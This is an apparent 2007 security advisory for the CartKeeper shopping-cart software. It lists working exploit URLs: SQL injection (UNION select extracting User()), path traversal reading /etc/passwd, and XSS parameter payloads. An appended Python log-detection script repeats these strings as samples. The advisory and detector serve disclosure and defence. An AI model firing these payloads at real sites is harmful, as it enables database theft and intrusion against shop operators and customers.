Monday, July 9, 2007

SQL-Injection, local-include, XSS in CartKeeper

Advisory: SQL-Injection, local-include, XSS in CartKeeper

Home Page: http://www.cartkeeper.com/
Vulnerability: SQL-injection, local-include, XSS.
Vulnerable scripts: index.php, ckuser.php, display_page.php
#XSS:
http://localhost/index.php?page=5&keyword=%27&cond=[XSS]
http://localhost/index.php?page=5&keyword=">[XSS]
#Local-include:
http://localhost/ckuser.php?pg=../../../../../../../../../../etc/passwd
#SQL-injection:
http://localhost/display_page.php?i=-1+union+select+1,2,3,4/*
http://localhost/index.php?maincat=-1+or+1=1/*
#Example:
http://target/display_page.php?i=-1+union+select+1,User(),3,4/*
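
#Detection (added example, not part of the original advisory):
A log check that flags requests whose values for the parameters listed above (i, maincat, pg, keyword, cond) do not match the shape a legitimate request would have. The expected value shapes, the access-log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed shapes of legitimate values (not taken from CartKeeper's source).
NUMERIC = re.compile(r"\d+")                # ids and category numbers
PAGE_NAME = re.compile(r"[A-Za-z0-9_-]+")   # page name without path separators or dots
NO_MARKUP = re.compile(r"[^<>\"']*")        # search text without quotes or angle brackets

# (script, parameter) from the advisory -> (category, expected shape)
RULES = {
    ("display_page.php", "i"): ("sql-injection", NUMERIC),
    ("index.php", "maincat"): ("sql-injection", NUMERIC),
    ("ckuser.php", "pg"): ("local-include", PAGE_NAME),
    ("index.php", "keyword"): ("xss", NO_MARKUP),
    ("index.php", "cond"): ("xss", NO_MARKUP),
}

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (common log format assumed).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jul/2007:10:00:01 +0000] "GET /display_page.php?i=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [09/Jul/2007:10:00:05 +0000] "GET /display_page.php?i=-1+union+select+1,2,3,4/* HTTP/1.1" 200 812',
    '192.0.2.44 - - [09/Jul/2007:10:00:09 +0000] "GET /ckuser.php?pg=../../../../../../../../../../etc/passwd HTTP/1.1" 200 1400',
    '192.0.2.44 - - [09/Jul/2007:10:00:12 +0000] "GET /index.php?page=5&keyword=%27&cond=x HTTP/1.1" 200 900',
    '192.0.2.10 - - [09/Jul/2007:10:00:20 +0000] "GET /index.php?maincat=3&keyword=blue+widget HTTP/1.1" 200 7000',
    '192.0.2.44 - - [09/Jul/2007:10:00:31 +0000] "GET /index.php?maincat=-1+or+1=1/* HTTP/1.1" 200 9100',
]

def classify(line):
    """Return sorted (script, parameter, category) tuples for values outside the expected shape."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    hits = set()
    # parse_qs percent-decodes values and turns '+' into a space before matching.
    for name, values in parse_qs(url.query).items():
        rule = RULES.get((script, name))
        if rule and any(not rule[1].fullmatch(v) for v in values):
            hits.add((script, name, rule[0]))
    return sorted(hits)

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for hit in classify(line):
            print(hit, "<-", line)
```

The same expected shapes can be enforced server-side as input validation, since each flagged request is one the application should have rejected.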
